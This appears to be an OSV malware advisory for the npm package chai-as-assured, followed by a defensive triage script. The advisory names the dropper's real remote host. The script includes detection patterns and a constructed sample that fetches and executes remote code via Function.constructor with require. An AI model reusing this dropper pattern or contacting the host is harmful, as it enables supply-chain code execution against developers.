npm

chai-as-assured @7.1.2

Vulnerability report · Last retrieved from osv.dev June 26, 2026 at 9:50 PM UTC

Malicious

OSV ID

MAL-2026-6532

Ecosystem

npm

Summary

chai-as-assured impersonates the popular chai-as-promised package (matching README, author, and API surface). When the exported plugin function is invoked under normal usage, an async IIFE in the plugin body base64-decodes a hardcoded URL (https://amethyst-lorrin-26.tiiny.site/index.json), performs an axios.get against that anonymous third-party host with a disguised header, and executes the response's cookie field as JavaScript via new Function.constructor('require', response)(require). The fetched payload runs with full Node module privileges (filesystem, network, child_process, etc.) because require is passed in. The C2 URL, header name (x-secret-key), and header value are concealed as base64 strings inside a fake local process.env object (DEV_API_KEY / DEV_SECRET_KEY / DEV_SECRET_VALUE) that shadows Node's global to evade casual source review. The combination of name confusion against a top-100 chai ecosystem package, deliberate obfuscation of attacker infrastructure, an unpinned anonymous tiiny.site host, and dynamic execution of the fetched response with require is an unambiguous remote-code-execution dropper targeting any project that installs and loads this plugin.

Source: amazon-inspector (bd28efd7a3d07f87ec22556cc25a8c07117fa4cdd237c6cb1db750c976a11836)
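The indicators in the summary above lend themselves to a cheap static triage check on a package's source before it is loaded. The following is an added example and is not code from the advisory, from Amazon Inspector, or from the chai project: it decodes base64-looking string literals and flags any that turn out to be URLs or custom header names, flags a module-level declaration that shadows process, and flags a Function or Function.constructor call that takes require as a parameter. The sample source is constructed to mirror the structure described and uses a placeholder host, not the reported one.

```javascript
// Added example (not from the advisory or any scanner): static triage for the
// indicators this report describes. Sample input is constructed and uses a
// placeholder host, not the reported one.

// Quoted strings that look like base64: alphabet only, 12+ chars, optional padding.
const B64_LITERAL = /['"`]([A-Za-z0-9+/]{12,}={0,2})['"`]/g;

// Decode every base64-looking literal, keeping only printable-ASCII results
// (ordinary identifiers that happen to fit the alphabet decode to garbage).
function decodeBase64Literals(src) {
  const hits = [];
  for (const m of src.matchAll(B64_LITERAL)) {
    const decoded = Buffer.from(m[1], 'base64').toString('utf8');
    if (decoded.length > 3 && /^[\x20-\x7e]+$/.test(decoded)) hits.push({ encoded: m[1], decoded });
  }
  return hits;
}

// Return human-readable findings for one package source file.
function triageSource(src) {
  const findings = [];
  for (const h of decodeBase64Literals(src)) {
    if (/^https?:\/\//i.test(h.decoded)) findings.push(`base64-hidden URL: ${h.decoded}`);
    else if (/^x-[a-z0-9-]+$/i.test(h.decoded)) findings.push(`base64-hidden header name: ${h.decoded}`);
  }
  // A module-level `process` declaration shadows Node's global, so process.env.X
  // reads resolve to attacker-chosen constants rather than real configuration.
  if (/\b(const|let|var)\s+process\s*=/.test(src)) findings.push('local object shadows process');
  // Function / Function.constructor taking a 'require' parameter: whatever text is
  // passed in will run with full module privileges.
  if (/Function(\.constructor)?\s*\(\s*['"]require['"]/.test(src)) {
    findings.push('dynamic code execution with require passed in');
  }
  return findings;
}

// Constructed sample mirroring the structure the report describes (no real host).
const PLACEHOLDER_URL = 'https://example.invalid/index.json';
const SAMPLE_SOURCE = `
const process = { env: {
  DEV_API_KEY: '${Buffer.from(PLACEHOLDER_URL).toString('base64')}',
  DEV_SECRET_KEY: '${Buffer.from('x-secret-key').toString('base64')}' } };
module.exports = function plugin(chai, utils) {
  (async () => {
    const res = await client.get(atob(process.env.DEV_API_KEY));
    new Function.constructor('require', res.cookie)(require);
  })();
};`;
const BENIGN_SOURCE = `module.exports = function plugin(chai) { chai.use(require('./helpers')); };`;
console.log(triageSource(SAMPLE_SOURCE), triageSource(BENIGN_SOURCE));
```

Each check alone produces false positives on legitimate packages (base64 fixtures, test doubles for process); it is the co-occurrence of a hidden URL, a shadowed process, and dynamic execution with require that matches this report and justifies blocking the package for manual review.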
